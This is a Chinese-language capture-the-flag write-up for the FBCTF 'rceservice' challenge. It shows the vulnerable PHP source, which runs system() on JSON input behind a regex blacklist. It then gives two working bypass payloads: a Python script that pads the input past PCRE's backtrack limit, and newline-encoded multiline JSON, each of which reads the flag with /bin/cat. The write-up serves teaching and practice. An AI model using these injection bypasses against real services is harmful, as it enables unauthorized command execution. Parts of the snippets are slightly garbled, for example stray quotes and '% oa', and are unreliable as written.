# 题目分析
对着题目一顿操作没弄出个所以
发现题目本身是给了源码的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| <?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd'];
if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) { echo 'Hacking attempt detected<br/><br/>'; } else { echo 'Attempting to run command:<br/>'; $cmd = json_decode($json, true)['cmd']; if ($cmd !== NULL) { system($cmd); } else { echo 'Invalid input'; } echo '<br/><br/>'; } }
?>
|
分析一波过滤了确实多
要求输入 json 格式
# 解法一
正则 trick
当正则表达式匹配超过 10000000 次时,preg_match 将 false 直接返回。

1 2 3 4 5 6
| import requests
payload = '{"cmd":"ls /","zz":"' + "a"*(1000000) + '"}'
r = requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload}) print r.text
|
构造脚本
题目 PATH 被更改所以用绝对路径
1
| {"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}
|
# 解法二
绕过 preg_match
绕过 preg 匹配的最常见方法之一是使用多行输入,因为 preg 匹配只尝试匹配第一行。而恰好,JSON 可以被格式化为多行,例如:
1 2 3
| { "cmd": "ls /home/rceservice" }
|
由于没有过滤多行输入的检查,所以可以直接构造
1 2 3
| { "cmd": "/bin/cat /home/rceservice/flag" }
|
记得将换行进行 url 编码 % oa
1
| ?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}
|
参考链接
参考链接